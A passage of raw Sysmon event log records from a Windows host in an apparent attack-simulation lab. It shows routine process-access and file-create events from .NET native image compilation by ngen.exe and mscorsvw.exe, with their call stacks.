ows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.876{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.876{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.829{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bec-0\PresentationFramework-SystemData.dll2021-01-18 13:46:33.829 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.767{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.767{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.657{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\124c-0\PresentationFramework-SystemCore.dll2021-01-18 13:46:33.657 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.610{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.610{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2302-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.532{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.532{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2202-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.438{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\614-0\PresentationBuildTasks.dll2021-01-18 13:46:33.438 11241100x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.923{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\PresentationFramework.Aero.dll2021-01-18 13:46:34.923 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.485{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.470{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.470{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2D02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.392{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.392{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2C02-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.329{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\121c-0\PresentationFramework-SystemXmlLinq.dll2021-01-18 13:46:34.329 10341000x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.282{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.282{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2B02-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.d